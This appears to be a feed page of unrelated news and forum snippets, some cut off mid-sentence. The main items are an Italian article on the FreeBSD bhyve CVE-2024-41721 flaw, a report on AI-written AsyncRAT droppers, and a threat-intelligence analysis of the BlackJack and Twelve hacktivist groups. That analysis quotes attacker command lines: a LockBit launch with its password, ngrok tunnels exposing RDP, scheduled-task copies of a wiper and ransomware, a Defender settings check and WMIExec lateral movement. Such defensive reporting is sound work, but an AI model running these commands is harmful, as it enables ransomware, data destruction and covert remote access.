L’importanza di aggiornare tempestivamente i sistemi e riavviare le macchine virtuali è cruciale per garantire che le correzioni abbiano effetto e per evitare che le vulnerabilità persistano nelle istanze in esecuzione.
La vulnerabilità CVE-2024-41721 colpisce uno dei componenti chiave di FreeBSD, l’hypervisor bhyve, il quale è ampiamente utilizzato per la virtualizzazione delle macchine. La criticità risiede nel codice USB, specificamente nell’emulazione XHCI, dove una mancanza di verifica dei limiti di memoria può permettere a un utente malintenzionato di leggere o scrivere fuori dai confini della memoria allocata, ottenendo il controllo del sistema host.
Ipervisori e sicurezza
Gli hypervisor, come bhyve, sono utilizzati per creare e gestire macchine virtuali (VM), e svolgono un ruolo cruciale nell’infrastruttura IT moderna, soprattutto in ambienti cloud e data center. La virtualizzazione permette a più sistemi operativi di girare simultaneamente su una singola macchina fisica, aumentando l’efficienza dell’uso delle risorse. Tuttavia, proprio a causa di questo modello condiviso, una vulnerabilità in un hypervisor può esporre l’intero sistema a rischi.
Il contesto della vulnerabilità
La vulnerabilità in questione è particolarmente insidiosa perché può essere sfruttata da un software dannoso eseguito in una macchina virtuale ospite, permettendo così l’esecuzione di codice arbitrario sull’host. Questo tipo di vulnerabilità rappresenta una minaccia per la separazione tra VM e host, uno dei principali vantaggi della virtualizzazione. In effetti, un attacco di questo genere compromette il modello di sicurezza dell’hypervisor.
Secondo il bollettino di sicurezza di FreeBSD, la vulnerabilità deriva da una cattiva gestione della memoria nell’emulazione del controller XHCI. Il controller XHCI è una parte del sistema utilizzata per gestire i dispositivi USB 3.0 e superiori, permettendo alle VM di interagire con dispositivi USB virtuali. La mancata verifica delle dimensioni dei dati che passano attraverso l’emulazione USB può portare a un’alterazione dei dati in memoria, consentendo a un attaccante di leggere o scrivere al di fuori delle aree di memoria consentite, violando l’integrità del sistema.
Exploit potenziale e scenari di attacco
Questa vulnerabilità è particolarmente critica perché bhyve opera con privilegi di root, aumentando il potenziale impatto di un exploit riuscito. Un attaccante che sfrutta questa vulnerabilità potrebbe provocare il crash dell’hypervisor o, peggio, eseguire codice malevolo con i privilegi più elevati disponibili. La possibilità di controllo remoto dell’host da parte di un attaccante su una VM vulnerabile rende questa vulnerabilità una delle minacce più gravi per gli ambienti FreeBSD.
Il fatto che bhyve operi in una sandbox tramite la tecnologia Capsicum mitiga solo parzialmente il rischio. Capsicum è un framework di sicurezza che limita i privilegi dei processi, ma non è sufficiente a eliminare del tutto la possibilità di attacchi sfruttando questa vulnerabilità. Inoltre, la vulnerabilità riguarda tutte le versioni supportate di FreeBSD che utilizzano bhyve con l’emulazione XHCI, rendendo necessario un aggiornamento immediato.
Impatto e mitigazione
L’unica soluzione per gli amministratori di sistema è aggiornare le loro installazioni di FreeBSD alla versione che include la patch rilasciata il 19 settembre 2024. Questo aggiornamento corregge la vulnerabilità risolvendo il problema della gestione errata della memoria. Inoltre, è fondamentale riavviare tutte le macchine virtuali che utilizzano dispositivi USB emulati per garantire che la correzione venga applicata correttamente.
In ambienti di produzione, dove l’uptime è critico, questo tipo di vulnerabilità rappresenta una seria minaccia. Un exploit di successo potrebbe causare danni significativi, incluse interruzioni del servizio, perdita di dati e accesso non autorizzato a informazioni sensibili. Il processo di patching richiede dunque un’attenta pianificazione per minimizzare l’impatto sulle operazioni quotidiane, ma è una misura imprescindibile per garantire la sicurezza dei sistemi.
Implicazioni più ampie nel contesto della sicurezza informatica
Questa vulnerabilità solleva diverse riflessioni. In primo luogo, evidenzia ancora una volta come le tecnologie di virtualizzazione, sempre più diffuse, siano divenute un bersaglio appetibile per i cybercriminali. Colpire un hypervisor significa potenzialmente avere accesso a più macchine virtuali e, di conseguenza, a una vasta gamma di dati e servizi.
In secondo luogo, la scoperta del bug di sicurezza da parte di Synacktiv, un’azienda francese nota per la sua esperienza nel campo delle vulnerabilità critiche, sottolinea l’importanza di una costante attività di auditing e testing sui software utilizzati, anche su sistemi apparentemente sicuri come FreeBSD.
Infine, questo caso specifico ci ricorda quanto sia pericoloso sottovalutare le vulnerabilità legate a componenti “periferici” come l’emulazione USB. Anche se a prima vista possono sembrare secondarie rispetto a falle più note e critiche, possono comunque essere sfruttate per ottenere un accesso non autorizzato ai sistemi principali.
Conclusione
La vulnerabilità RCE scoperta in FreeBSD è un chiaro segnale di allarme per amministratori di sistema e responsabili della sicurezza. In un panorama in cui le minacce continuano a evolversi e ad adattarsi, mantenere sistemi costantemente aggiornati e monitorati è fondamentale per prevenire attacchi potenzialmente devastanti. L’adozione di misure preventive, come la tempestiva applicazione delle patch e un attento controllo delle configurazioni di sistema, rimane l’unico modo efficace per mitigare il rischio di violazioni della sicurezza.
Inoltre, casi come questo ci ricordano l’importanza di una collaborazione costante tra aziende di sicurezza, sviluppatori di software e utenti, affinché le vulnerabilità siano identificate e risolte il più rapidamente possibile.
Gli analisti di HP Wolf Security hanno esaminato i recenti attacchi contro gli utenti francesi e hanno scoperto che il malware AsyncRATè stato distribuito utilizzando un codice dannoso chiaramente creato con l’aiuto dell’intelligenza artificiale.
Inoltre, si è già arrivati all’utilizzo dell’intelligenza artificiale per sviluppare malware. Così, nella primavera di quest’anno, i ricercatori della società Proofpoint hanno avvertito che per distribuire l’infostealer Rhadamanthys è stato utilizzato uno script PowerShell, probabilmente creato utilizzando LLM.
Un nuovo caso simile è stato registrato dagli specialisti di HP Wolf Security all’inizio di giugno. Gli attacchi sono iniziati con normali e-mail di phishing contenenti l’esca sotto forma di fattura sotto forma di allegato HTML crittografato.
“In questo caso, gli aggressori hanno inserito una chiave AES in JavaScript all’interno di un allegato. Ciò non accade molto spesso e questo è stato il motivo principale per cui abbiamo prestato attenzione a questa minaccia”, spiegano gli esperti e aggiungono che sono riusciti a bypassare la crittografia utilizzando la forza bruta regolare, poiché si sapeva che il file decrittografato doveva essere un archivio ZIP.
L’allegato decriptato conteneva VBScript, dall’esame del quale è emerso che “l’aggressore ha commentato e strutturato attentamente tutto il codice”, cosa che accade raramente se il codice è stato elaborato da una persona (gli aggressori di solito cercano di nascondere il funzionamento del loro malware). Lo scopo di VBScript era di rimanere attaccato alla macchina infetta, creando attività pianificate e nuove chiavi nel registro di Windows.
“Questi commenti descrivevano in dettaglio esattamente lo scopo del codice. Questo è ciò che di solito fanno i servizi di intelligenza artificiale generativa quando forniscono esempi di codice con spiegazioni”, scrivono gli esperti.
Inoltre, il lavoro dell’IA, secondo gli esperti, è stato indicato dalla struttura degli script, dai commenti su ogni riga, nonché dalla scelta del francese per i nomi delle funzioni e delle variabili. Codice dannoso scritto dall’intelligenza artificiale Di conseguenza, AsyncRAT è stato scaricato ed eseguito sul sistema della vittima. Si tratta di un malware gratuito e open source che consente di intercettare le sequenze di tasti, fornisce una connessione crittografata al computer della vittima e può anche scaricare payload aggiuntivi.
I ricercatori concludono che l’intelligenza artificiale generativa può aiutare i criminali poco qualificati a scrivere malware in pochi minuti e ad adattarlo per attaccare diverse piattaforme (Linux, macOS, Windows, ecc.). E anche se gli aggressori sofisticati non utilizzano l’intelligenza artificiale per lo sviluppo vero e proprio, possono utilizzarla per accelerare le cose.
The Hungarian Presidency of the Council of the EU should delete any reference to consolidation in the telecommunications market in the next iteration of the draft Council conclusions which should be published on 9 October, four sources with insider knowledge told Euractiv.
While analyzing attacks on Russian organizations, our team regularly encounters overlapping tactics, techniques, and procedures (TTPs) among different cybercrime groups, and sometimes even shared tools. We recently discovered one such overlap: similar tools and tactics between two hacktivist groups – BlackJack and Twelve, which likely belong to a single cluster of activity.
In this report, we will provide information about the current procedures, legitimate tools, and malware used by the BlackJack group, and demonstrate their similarity to artifacts found in Twelve’s attacks. We will also analyze another recently discovered activity that has much in common with the activity of the potential cluster.
Who are BlackJack?
BlackJack is a hacktivist group that emerged at the end of 2023, targeting companies based in Russia. In their Telegram channel, the group states that it aims to find vulnerabilities in the networks of Russian organizations and government institutions.
As of June 2024, BlackJack has publicly claimed responsibility for over a dozen attacks. Our telemetry also contains information on other unpublicized attacks, where indicators suggest BlackJack’s involvement.
The group only uses freely available and open-source software, such as the SSH client PuTTY or the wiper Shamoon, which has been available on GitHub for several years. This confirms that the group operates as hacktivists and lacks the resources typical of large APT groups.
Malware and legitimate tools in BlackJack attacks
Wiper – Shamoon
BlackJack uses a version of the Shamoon wiper written in Go in their attacks. Static analysis helped us extract the following characteristic strings:
Strings from the wiper
During our research, we found Shamoon samples in the following locations: Sysvol\domain\scripts \\[DOMAIN]\netlogon\ C:\ProgramData\
Ransomware – LockBit
In addition to the wiper, BlackJack also uses a leaked version of the LockBit ransomware to harm their victims.
Verdicts with which BlackJack’s version of LockBit was detected, source: Kaspersky Threat Intelligence Portal (TIP)
We found the ransomware in the same directories as the wiper: Sysvol\domain\scripts \\[DOMAIN]\netlogon\ C:\ProgramData\ The network directories for placing the malware were not chosen at random. This allows the attackers to spread their samples across the victim’s infrastructure and later place them in C:\ProgramData\ for further execution in the system. To launch LockBit, the attackers use scheduled tasks containing the following command line (the 32-character password may vary depending on the host or victim): C:\ProgramData\bj.exe -pass aa83ec8e98326e234260ebb650d48f20 The ransom note only contains the name of the group:
Contents of the LockBit ransom note
This confirms that the group is not aiming for financial gain, but rather to cause damage to the compromised organization.
Ngrok
To maintain persistent access to compromised victim resources, the attackers use tunneling with the common ngrok utility. We found the utility and its configuration file in the following directories:
Launches the ngrok.exe process and creates a TCP tunnel on port 3389 (RDP).
.\ngrok.exe tcp 3389
Alternative for creating a TCP tunnel on port 3389 (RDP).
.\ngrok.exe udp 3389
Creates a UDP tunnel on port 3389 (RDP).
Radmin, AnyDesk, PuTTY
To ensure remote access to the system, BlackJack installs various remote access tools (RATs). Judging by the incidents we studied, the attackers initially attempted to use the Radmin utility, but all the external connections we observed were made through AnyDesk.
During the RAT installation, the attackers created the following services:
Additionally, the popular SSH client PuTTY was used to connect to certain hosts within the infrastructure.
Connection with the Twelve group
The malware and legitimate tools described above significantly overlap with the arsenal of the hacktivist group Twelve. This group also relies on publicly available software and does not use proprietary tools in its attacks.
Most of the connections and overlaps between the two groups were discovered through Kaspersky Security Network (KSN) telemetry and Kaspersky Threat Intelligence solutions. KSN telemetry is anonymized data from users of our products who have consented to share and process this information.
Malware sample similarities
Let’s first examine the similarities between the ransomware and wiper samples from the BlackJack and Twelve groups. Below is the information from the Kaspersky Threat Intelligence Portal (TIP) on the LockBit ransomware file discovered while investigating the BlackJack attacks:
BlackJack file information
The sample is named bj.exe, presumably an abbreviation for the BlackJack group. Among other things, the TIP page shows a list of similar files compiled using the Similarity technology, which identifies files with similar patterns. Although the sample used by the hacktivists was created with the leaked LockBit builder, Similarity first identifies the most closely related files. Note the first hash in the list: 39B91F5DFBBEC13A3EC7CCE670CF69AD.
List of similar files
Checking this hash on the Threat Intelligence Portal reveals that it was mentioned in our recent investigation into the Twelve group.
This suggests that the two groups use similar LockBit samples. Additionally, analysis of the configuration of the two samples (BlackJack and Twelve) showed that their exclusion lists (files, directories, and extensions to leave unencrypted) are identical.
Just like the BlackJack’s LockBit sample, the Twelve group’s ransomware also has a list of similar files.
List of similar files
Upon checking one of them (underlined in red on the screenshot), we found that the file was also named bj.exe. This means that it is another instance of the BlackJack group’s ransomware, further indicating that the two groups use nearly identical LockBit samples. Below is a list of paths where LockBit samples were found during the investigation of incidents related to the BlackJack and Twelve groups:
BlackJack
Twelve
\\[DOMAIN]\netlogon\
\\[DOMAIN]\netlogon\
C:\ProgramData\
C:\ProgramData\
Sysvol\domain\scripts
–
Summing up the ransomware analysis, we can draw the following conclusions:
Both groups use similar LockBit ransomware samples;
The paths where these samples were found are almost identical.
Let’s continue searching for further connections.
Wiper reuse
The study of wiper samples from incidents involving the BlackJack and Twelve groups also revealed similarities between them.
Both wipers overwrite the MBR record with almost identical placeholder strings:
MBR placeholder of the BlackJack wiper
MBR placeholder of the Twelve wiper
By analyzing the BlackJack wiper on the Threat Intelligence Portal, we found that in some cases it was extracted from the following archive:
Information about the archive containing the BlackJack wiper
Examining the archive, we found the Chaos ransomware – 646A228C774409C285C256A8FAA49BDE:
Ransomware file in the archive
Moreover, this file was mentioned in our report on the Twelve group. That is, malware from both groups is distributed in the same archive.
Checking the file names and paths, we discovered a familiar network directory \sysvol\domain\script. File names and paths
In addition, during our investigation of attacks carried out by the Twelve group, we also found the use of Shamoon-based wipers. Moreover, according to KSN data, a specific variant of Shamoon, which was involved in BlackJack group attacks, was also seen in some Twelve attacks.
Similar to the analysis of the LockBit ransomware, we decided to study the paths where the wipers were found in incidents related to the BlackJack and Twelve groups. As you can see from the table below, these paths are identical:
BlackJack
Twelve
Sysvol\domain\scripts
Sysvol\domain\scripts
\\[DOMAIN]\netlogon\
\\[DOMAIN]\netlogon\
C:\ProgramData\
C:\ProgramData\
Summing up the analysis of the Shamoon wiper, we can confidently say that both groups use it or its components in their attacks and place them in identical directories. Moreover, the version of Shamoon that became available as a result of the leak was written in C#, whereas the variants of this wiper used in the BlackJack and Twelve attacks were rewritten in Go, further supporting the connection between these groups.
Familiar commands and utilities
In addition to the connections identified through analyzing the malware samples, we also discovered overlaps in the commands and tools used by both groups.
Below are the commands found in the BlackJack and Twelve group attacks.
During our research, we also discovered another activity that closely resembles the ones described above. At this point, we cannot definitively determine which specific group is responsible for this activity; however, the malware samples and procedures clearly indicate that the source is the activity cluster under investigation.
The similarities we found are listed below:
The discovered wiper contains the characteristic strings we saw in the Twelve and BlackJack wipers and also creates a similar MBR record.
The wiper is spread through the sysvol network directory and saved using a scheduled task, which copies it to that same C:\ProgramData directory. reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\letsgo.exe` -Destination `C:\ProgramData`
As in the BlackJack and Twelve attacks, before wiping data with the wiper, the attackers launch the ransomware (enc.exe), which is also copied from the network folder to C:\ProgramData: reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\<GUID>:Actions","`powershell.exe` Copy-Item `\\[DOMAIN]\SYSVOL\[DOMAIN]\SCRIPTS\enc.exe` -Destination `C:\ProgramData`
As in Twelve group attacks, the execution of the wiper, as well as copying the wiper and ransomware from the network directory to the C:\ProgramData folder, are performed using scheduled tasks:
Also during the investigation of this activity, various artifacts and procedures were discovered that we had not seen in the BlackJack and Twelve attacks:
Using the PowerShell cmdlet Get-MpPreference to gather information about disabled Windows Defender features. powershell.exe` -ex bypass -c Get-MpPreference | fl disable*
Collecting information about disabled Windows Defender features
Using WMIExec for lateral movement into the root directory. cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1710197641.3559299 2>&1
Victims
The mentioned malware samples, utilities, and command lines were found in the infrastructures of government, telecommunications, and industrial companies in Russia.
Attribution
Based on our research, we cannot be sure that the same actors are behind the activities of both groups. However, we suspect that the BlackJack and Twelve groups are part of a unified cluster of hacktivist activity aimed at organizations located in Russia.
Conclusion
In this study, we demonstrated that the BlackJack and Twelve groups have similar targets and use similar malware, distributing and executing it using the same methods. At the same time, they are not interested in financial gain but aim to inflict maximum damage on target organizations by encrypting, deleting, and stealing data and resources.
fatemi capire... se per te uno che hai sulle palle, che fa sempre stronzate, ne fa una giusta, gli dai contro anche quando fa quella giusta? l'onestà che fine ha fatto?
@Notizie dall'Italia e dal mondo Zamaair e la sua famiglia hanno dovuto vendere tutto quello che possedevano per poter scappare da Kabul. Sono da un anno e mezzo in Pakistan, in attesa di asilo L'articolo Storie afgane di fughe e diritti negati proviene da Pagine Esteri.
@Informatica (Italy e non Italy 😁) L’ITU, l’agenzia Onu che gestisce le politiche globali sullo spettro radio, elogia l’Italia nel Global Cybersecurity Index 2024. Il nostro paese ha passato a pieni voti (100/100) l’esame dell’agenzia, che ci riconosce come leader mondiale per la sua postura nella cybersicurezza, grazie a: Un ottimo traguardo che ci
Lo studio Trend Micro approfondisce l’attitudine dei responsabili alla gestione del rischio legato alle superfici di attacco, evidenziando le lacune che potrebbero compromettere gravemente la resilienza informatica delle organizzazioni.
Dalla ricerca emerge che:
Solo il 36% del campione dispone di personale sufficiente per garantire la copertura della sicurezza informatica 24 ore su 24, 7 giorni su 7, tutto l’anno
Solo il 35% utilizza tecniche di attack surface management per misurare il rischio della superficie di attacco
Solo il 34% è conforme a quadri normativi comprovati, come ad esempio il NIST
L’incapacità, della maggior parte delle aziende, di soddisfare questi requisiti fondamentali di sicurezza, potrebbe essere correlata a una mancanza di leadership e responsabilità dei vertici dell’organizzazione. La metà (48%) degli intervistati ha, infatti, affermato che i responsabili aziendali non considerano la sicurezza informatica un loro compito. Alla domanda su chi abbia o dovrebbe avere la responsabilità di mitigare il rischio aziendale, le risposte hanno indicato una mancanza di chiarezza sulle linee guida. Il 31% ha però affermato che la responsabilità spetterebbe ai team IT.
La mancanza di una direzione certa sulla strategia di sicurezza informatica potrebbe essere il motivo per cui oltre la metà (54%) degli intervistati si è lamentata dell’atteggiamento della propria organizzazione nei confronti del rischio informatico, indicato come incoerente e variabile a seconda del periodo (54%).
La mancanza di una strategia chiara in ambito cyber può influenzare negativamente la capacità di un’organizzazione di prendere decisioni rapide e coerenti.
“È importante che i Chief Information Security Officer (CISO) comunichino i rischi informatici con chiarezza, utilizzando tutti gli strumenti a disposizione e coinvolgendo attivamente i Consigli di Amministrazione”, afferma Alessandro Fontana, Country Manager di Trend Micro Italia. “Per affrontare al meglio queste sfide, le aziende dovrebbero prendere in considerazione l’adozione di una soluzione integrata. Tale soluzione non solo deve proteggere l’intera superficie di attacco, ma anche permettere un monitoraggio dei rischi in tempo reale e una gestione automatizzata delle criticità. Questo approccio rafforza notevolmente la resilienza dell’organizzazione ed è inoltre cruciale che la piattaforma sia integrabile con soluzioni di terze parti, per garantire una protezione completa e una gestione più fluida della sicurezza”.
Lo studio ha infatti rivelato che in molte organizzazioni questo non avviene e circa il 96% degli intervistati nutre preoccupazioni circa la propria superficie di attacco. Il 36% vorrebbe trovare un modo per scoprire, valutare e mitigare le aree ad alto rischio, mentre il 19% non è in grado di lavorare su un’unica fonte di verità.
Have you wanted to get into GPU programming with CUDA but found the usual textbooks and guides a bit too intense? Well, help is at hand in the form of a series of increasingly difficult programming ‘puzzles’ created by [Sasha Rush]. The first part of the simplification is to utilise the excellent NUMBA python JIT compiler to allow easy-to-understand code to be deployed as GPU machine code. Working on these puzzles is even easier if you use this linked Google Colab as your programming environment, launching you straight into a Jupyter notebook with the puzzles laid out. You can use your own GPU if you have one, but that’s not detailed.
The puzzles start, assuming you know nothing at all about GPU programming, which is totally the case for some of us! What’s really nice is the way the result of the program operation is displayed, showing graphically how data are read and written to the input and output arrays you’re working with. Each essential concept for CUDA programming is identified one at a time with a real programming example, making it a breeze to follow along. Just make sure you don’t watch the video below all the way through the first time, as in it [Sasha] explains all the solutions!
Al Kath
in reply to Pëtr Arkad'evič Stolypin • • •un messaggio di quelli che possono essere capiti anche dagli americani
@news